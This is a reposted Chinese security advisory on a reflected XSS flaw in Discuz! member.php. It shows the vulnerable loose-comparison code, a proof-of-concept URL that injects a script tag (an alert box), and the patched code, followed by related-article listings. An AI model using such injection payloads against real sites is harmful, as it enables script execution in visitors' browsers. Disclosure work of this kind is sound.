discuz member.php,Discuz! member.php xss bug

最新推荐文章于 2021-03-26 04:27:39 发布
最新推荐文章于 2021-03-26 04:27:39 发布
阅读量179 收藏
点赞数
文章标签: discuz member.php

Discuz! member.php xss bug

author: 80vul-B

team:[url]http://www.80vul.com[/url]

一 分析

member.php代码:

if(!empty($listgid) && ($listgid == intval($_GET['listgid']))) {

//这里用的等于[==]而不是全等[===]进行的比较,且$listgid并没有初始化:)

$type = $adminid == 1 ? 'grouplist' : $type;

} else {

$listgid = '';

}

...

$multipage = multi($num, $memberperpage, $page, "member.php?action=list&listgid=$listgid&srchmem=".rawurlencode($srchmem)."&order=$order&type=$type", $membermaxpages);

二 利用

poc:

poc:

[url]http://www.80vul.com/bbs/member.php?action=list&listgid=%22%3E%3Cscript%3Ealert[/url](/xss/)%3C/script%3E

会员列表页面存在分页时触发

三 补丁[fix]

刚发布的dz7 bt版本[1]已经fix这个漏洞了:

if(!empty($listgid) && ($listgid = intval($_GET['listgid']))) {

$type = $adminid == 1 ? 'grouplist' : $type;

} else {

$listgid = '';

}

[1]:[url]http://download.comsenz.com/Discuz/7.0.0Beta/Discuz_7_Beta_SC_GBK.zip[/url]

大图都
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php学习实例]会员系统member完整版
08-27
php学习实例]会员系统member完整版,包含所有数据库文件
xss.js.zip
07-29
XSS(Cross-Site Scripting)攻击是一种常见的网络安全威胁,主要发生在Web应用中。它利用了网站的信任,将恶意脚本注入到网页中,当其他用户访问这些被篡改的页面时,恶意脚本会在用户的浏览器上执行,从而窃取用户...
discuzmember.php,Discuz! member.php xss bug
weixin_36267615的博客
03-26 469
Discuz! member.php xss bugauthor: 80vul-Bteam:[url]http://www.80vul.com[/url]一 分析member.php代码:if(!empty($listgid) && ($listgid == intval($_GET['listgid']))) {//这里用的等于[==]而不是全等[===]进行的比较,且$list...
discuz member.php,Discuz!X中SESSION机制实例详解
weixin_35796591的博客
03-12 493
这篇文章主要介绍了Discuz!X中SESSION机制,以实例形式较为详细的分析了Discuz!X中SESSION机制的原理与数据库操作技巧,具有一定参考借鉴价值,需要的朋友可以参考下本文实例讲述了Discuz!X中SESSION机制。分享给大家供大家参考。具体如下:在Discuz! X中一如继往的,SESSION 并没有使用 PHP 自带的 SESSION 机制,而是系统的一套自带的机制。在数据...
discuz member.php,Discuz启用Memberchach完美教程
weixin_33331559的博客
03-12 342
大致我们需要三步1.在网站后台开启Memberchach并配置参数2.修改网站配置文件config_global.php3.配置Php环境使它支持Memberchach下面我们开始动手首先进入DZ论坛管理后台—后台配置如下图片在这里配置好你的参数,即可修改配置文件config_global.php$_config[\’memory\’][\’memcache\’][\’server\’] = \’...
discuz 修改member.php,Discuz启用Memberchach具体如何操作
weixin_34169503的博客
03-19 281
大致我们需要三步:1.在网站后台开启Memberchach并配置参数;2.修改网站配置文件config_global.php;3.配置Php环境使它支持Memberchach。Discuz启用Memberchach具体是如何操作的?首先进入DZ论坛管理后台---后台配置,在这里配置好你的参数,即可。修改配置文件config_global.php代码如下:$_config['memory']['me...
计算机后端-PHP视频教程. php之blog实战52-xss攻击与防范.wmv
05-22
计算机后端-PHP视频教程. php之blog实战52-xss攻击与防范.wmv
计算机后端-PHP视频教程. laravel-el25 防xss攻击.wmv
05-22
计算机后端-PHP视频教程. laravel-el25 防xss攻击.wmv
moodle_php_reply_variable_xss.nasl
最新发布
11-08
moodle_php_reply_variable_xss
member.php?mod=register文件在哪里,DEDECMS修改member会员中心文件夹名称 更改member目录名称...
weixin_32589387的博客
03-26 1164
DEDECMS做站过程中有时候不可避免被各种营销软件强行发布广告,因此为了避免这个情况,我们要嘛是加强注册审核,要嘛就是参考我们这篇文章,将会员中心文件夹完全改名,避免被特征扫描到。下面是操作方法:1、首先进入FTP将你的member文件夹,更名比如更名为user2、首先打开 include/common.inc.php 文件找到define('DEDEMEMBER',DEDEROOT.'/mem...
member.php?mod=register文件在哪里,PHPCMS会员管理模块部分文件及位置
weixin_42144707的博客
03-26 1301
PHPCMS会员管理模块的部分文件及位置(网站二次开发修改)1. 会员注册字段显示修改【文件+数据库】后台添加字段模板文件名:member_modelfield_add.tpl.php【添加】F:\Gwork\phpcmsvl\phpcms\modules\member\templates后台修改字段:模板文件名:member_modelfield_edit.tpl.php【添加】F:\Gwork...
member.php 旅行交通_PHP实现登录,注册,密码修改
weixin_39742065的博客
12-21 552
var tel = '';$(function(){var check = {checkPwd: function(password){if (typeof password == 'undefined' || password == '') {return false;}return true;},checkSmscode: function(code){if (typeof code == '...
MySQL相关知识整理
Jeromeyoung
12-13 827
文章目录前言第一章 MySQL是什么?第二章 数据库的五个基本单位第三章 Mysql连接数据库第四章 Mysql数据库操作一、创建数据库二、查看数据库三、选中数据库四、查看数据库中的表五、删除数据库第五章 Mysql数据表操作一、创建表二、查看表字段结构信息三、查看表创建语句四、删除表五、指定表引擎和字符集第六章 Mysql数据字段操作一、查看表结构二、修改表字段类型 modify三、增加表字段四、删除表字段五、表字段改名六、修改表字段排列顺序七、修改表名第七章 Mysql数据类型第八章 Mysql字符.
猜测 member.php,自上而下,逐步揭开PHP解析大整数的面纱
weixin_42261068的博客
03-10 107
遇到的问题最近遇到一个PHP大整数的问题,问题代码是这样的$shopId = 17978812896666957068;var_dump($shopId);上面的代码输出,会把$shopId转换成float类型,且使用了科学计数法来表示,输出如下:float(1.7978812896667E+19)但在程序里需要的是完整的数字作为查找数据的参数,所以需要用的是完整的数字,当时以为只是因为数据被转换...
医疗保险 member.php,php学习实例]会员系统member完整版
weixin_34977617的博客
03-11 1051
【实例简介】php学习实例]会员系统member完整版,包含所有数据库文件【实例截图】【核心代码】member└── member├── Connections│ └── member.php├── create_member.sql├── detail.php├── getpwd1.php├── getpwd2.php├── getpwd3.php├── getpwd4.php├── ima...
猜测 member.php,PHPMPS v2.3 /member.php SQL注入漏洞
weixin_30301989的博客
03-10 375
/member.phpcase 'send':$paycenter = trim($_POST['paycenter']);$contactname = trim($_POST['contactname']);$telephone = trim($_POST['telephone']);$email = trim($_POST['email']);$username = trim($_POST['...
member.php?mod=register文件在哪里,织梦member会员中心文件夹目录修改设置方法
weixin_33166692的博客
03-26 1787
dede网站的member文件目录也是会被收到恶意代码攻击的途径之一,一般很大站长如果网站没有会员系统,只是用于产品或者服务的展示,可以移除此文件,如果移除此文件或者网站需要会员系统,那为了安全起见,可以去修改member文件加名称,来提升网站安全性!下面是操作方法:1、比如将member文件夹,更名比如更名为zhuochu_user2、首先打开include/common.inc.php文件...
Discuz核心源码深度解析:common.inc.php与全局机制
再者,`security.inc.php`专注于安全相关的设置和函数,如防止SQL注入、XSS攻击的过滤机制,以及验证码、登录保护等功能。此文件中可能会定义一些安全相关的函数,例如对用户输入的数据进行清理和验证。 在深入分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值